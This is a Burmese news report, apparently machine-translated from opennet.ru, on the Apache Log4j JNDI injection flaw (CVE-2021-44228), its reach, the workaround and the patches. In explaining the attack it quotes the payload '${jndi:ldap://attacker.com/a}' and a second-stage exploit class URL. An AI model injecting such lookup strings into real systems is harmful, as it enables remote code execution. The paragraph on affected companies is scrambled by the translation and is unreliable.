Java ပရောဂျက်များစွာကို ထိခိုက်စေသော Apache Log4j တွင် ကပ်ဘေးဖြစ်နိုင်သော အားနည်းချက်

Apache Log4j တွင်၊ Java အပလီကေးရှင်းများတွင် လော့ဂ်အင်လုပ်ခြင်းအတွက် ရေပန်းစားသော မူဘောင်တစ်ခု၊ “{jndi:URL}” ဖော်မတ်တွင် အထူးဖော်မတ်ထားသည့်တန်ဖိုးကို မှတ်တမ်းသို့ရေးသောအခါတွင် မထင်သလိုကုဒ်ကို လုပ်ဆောင်နိုင်စေမည့် အရေးကြီးသော အားနည်းချက်ကို ဖော်ထုတ်ထားသည်။ တိုက်ခိုက်မှုသည် ပြင်ပရင်းမြစ်များမှ ရရှိသည့်တန်ဖိုးများကို မှတ်တမ်းတင်သည့် Java အပလီကေးရှင်းများပေါ်တွင် လုပ်ဆောင်နိုင်ပြီး ဥပမာအားဖြင့် ပြဿနာရှိသော တန်ဖိုးများကို အမှားမက်ဆေ့ချ်တွင် ပြသသည့်အခါ၊

Apache Struts၊ Apache Solr၊ Apache Druid သို့မဟုတ် Apache Flink ကဲ့သို့သော မူဘောင်များကို အသုံးပြုသည့် ပရောဂျက်အားလုံးနီးပါးသည် Steam၊ Apple iCloud၊ Minecraft ဖောက်သည်များနှင့် ဆာဗာများ အပါအဝင် ပြဿနာကြောင့် ထိခိုက်မိကြောင်း မှတ်သားရပါသည်။ အကြမ်းဖျင်းခန့်မှန်းချက်အရ၊ အကြမ်းဖျင်းခန့်မှန်းချက်အရ၊ Fortune ၏ 65% သည် ဝဘ်အက်ပလီကေးရှင်းများတွင်အသုံးပြုသည့် Apache Struts မူဘောင်ရှိ အရေးပါသောအားနည်းချက်များ၏သမိုင်းကြောင်းကို ထပ်တလဲလဲပြုလုပ်ကာ ကော်ပိုရိတ်အပလီကေးရှင်းများအပေါ် ကြီးမားသောတိုက်ခိုက်မှုများဖြစ်ပေါ်လာနိုင်သည်ဟု မျှော်လင့်ရသည်။ ကုမ္ပဏီ 100။ အားနည်းချက်ရှိသော စနစ်များအတွက် ကွန်ရက်ကို စကန်ဖတ်ရန် ကြိုးပမ်းမှုများ အပါအဝင်။

အလုပ်အမြတ်ထုတ်ခြင်းကို ထုတ်ဝေပြီးဖြစ်သည်ဟူသောအချက်ကြောင့် ပြဿနာပိုမိုဆိုးရွားလာသော်လည်း တည်ငြိမ်သောအကိုင်းအခက်များအတွက် ပြင်ဆင်မှုများကို မပြုစုရသေးပါ။ CVE အမှတ်အသားကို မသတ်မှတ်ရသေးပါ။ ပြုပြင်မှုသည် log4j-2.15.0-rc1 စမ်းသပ်မှုဌာနခွဲတွင်သာ ပါဝင်ပါသည်။ အားနည်းချက်ကို ပိတ်ဆို့ခြင်းအတွက် ဖြေရှင်းနည်းတစ်ခုအနေဖြင့် log4j2.formatMsgNoLookups ဘောင်ကို အမှန်ဟု သတ်မှတ်ရန် အကြံပြုအပ်ပါသည်။

log4j သည် JNDI (Java Naming and Directory Interface) queries များကို လုပ်ဆောင်နိုင်သည့် မှတ်တမ်းသို့ လိုင်းအထွက်တွင် “{}” အထူးမျက်နှာဖုံးများ လုပ်ဆောင်ခြင်းကို ပံ့ပိုးပေးသောကြောင့် ပြဿနာဖြစ်ရခြင်း ဖြစ်သည်။ တိုက်ခိုက်မှုသည် “${jndi:ldap://attacker.com/a}” ဟူသော အစားထိုးမှုဖြင့် စာတန်းတစ်ခုကို ဖြတ်သန်းသွားသည့်အခါတွင်၊ log4j သည် attacker.com ဆာဗာသို့ လမ်းကြောင်းအတွက် LDAP တောင်းဆိုမှုကို ပေးပို့လိမ့်မည် . တိုက်ခိုက်သူ၏ ဆာဗာမှ ပြန်လာသော လမ်းကြောင်း (ဥပမာ၊ http://second-stage.attacker.com/Exploit.class) သည် လက်ရှိ လုပ်ငန်းစဉ်၏ ဆက်စပ်မှုတွင် တိုက်ခိုက်သူအား မတရားကုဒ်ကို လုပ်ဆောင်နိုင်စေမည့် လမ်းကြောင်း လက်ရှိလျှောက်လွှာ၏အခွင့်အရေးများနှင့်အတူစနစ်။

နောက်ဆက်တွဲ 1- အားနည်းချက်ကို identifier CVE-2021-44228 ကို သတ်မှတ်ပေးထားပါသည်။

နောက်ဆက်တွဲ 2- ထုတ်ဝေမှု log4j-2.15.0-rc1 ဖြင့် ထည့်သွင်းထားသော ကာကွယ်မှုကို ကျော်ဖြတ်ရန် နည်းလမ်းကို ဖော်ထုတ်ထားသည်။ အပ်ဒိတ်အသစ်၊ log4j-2.15.0-rc2၊ အားနည်းချက်ကို ပိုမိုပြီးပြည့်စုံသော ကာကွယ်မှုဖြင့် အဆိုပြုထားသည်။ ကုဒ်သည် မှားယွင်းစွာဖော်မတ်ချထားသော JNDI URL ကို အသုံးပြုခြင်းတွင် မူမမှန်သော ရပ်စဲခြင်း မရှိခြင်းနှင့် ဆက်စပ်သော အပြောင်းအလဲကို မီးမောင်းထိုးပြပါသည်။

source: opennet.ru

မှတ်ချက် Add